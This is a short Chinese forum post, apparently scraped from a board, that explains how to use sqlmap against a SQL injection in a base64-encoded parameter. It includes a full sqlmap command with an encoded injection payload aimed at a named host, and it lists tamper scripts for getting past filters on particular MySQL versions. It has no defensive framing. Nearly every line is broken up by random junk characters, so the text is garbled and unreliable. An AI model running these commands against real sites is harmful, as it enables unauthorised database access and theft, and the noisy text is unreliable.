WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?1 f8 q9 \2 _1 \+ M$ |
8 d9 x0 D8 r0 S" [9 l" d
sqlmap的tamper里有个base64encode.py
" \& t7 F; i6 B' y0 `0 H% Z0 u! l9 Y1 p& N5 {! M1 T8 ~" p {
使用如下
0 d K7 R( ~! |: Z2 f3 ~) A! W1 Q4 v, O8 I5 z' ]8 l5 g0 g, t
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs) e, e; C+ O' a4 l, m0 j
! b, t, D0 f" x
* x+ Z& a* o7 Q& S$ z! Y8 Ksqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
1 A8 X) Z- k. c) F( s9 u3 e& z( S8 Y! i/ U+ B
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
1 n# d; |8 q9 R; v: P( U( f( D( d. G4 G
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入' Y' a* _+ R [ k4 c* |3 F( z2 A2 F
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
* Z+ L2 ^+ S% j. F" o5 s! p, M首先确定目标数据库版本,然后选择相应的脚本。
5 C; ]3 q Y' l-v 3 --batch --tamper "space2hash.py"! _: U- W6 ?5 x) C; i
2 {2 z$ F( g: |$ I0 l5 Y还有其他一些插件: N7 K4 p0 L' ^8 L
encodes编码 ——charencode.py" R$ `# d: z7 G2 J# w
base64编码 —— base64encode.py
% E& L) V ~1 H8 K- t替换空格和关键字 —— halfversionedmorekeywords.py
* [+ w# ^* f6 Q ?$ V$ k |
, `2 r+ h) V: `- u: @+ [& P, t) i" [, A5 s; S
8 r6 D2 p1 ?& h
/ K" z$ h4 a1 Y- a2 d* N/ s
|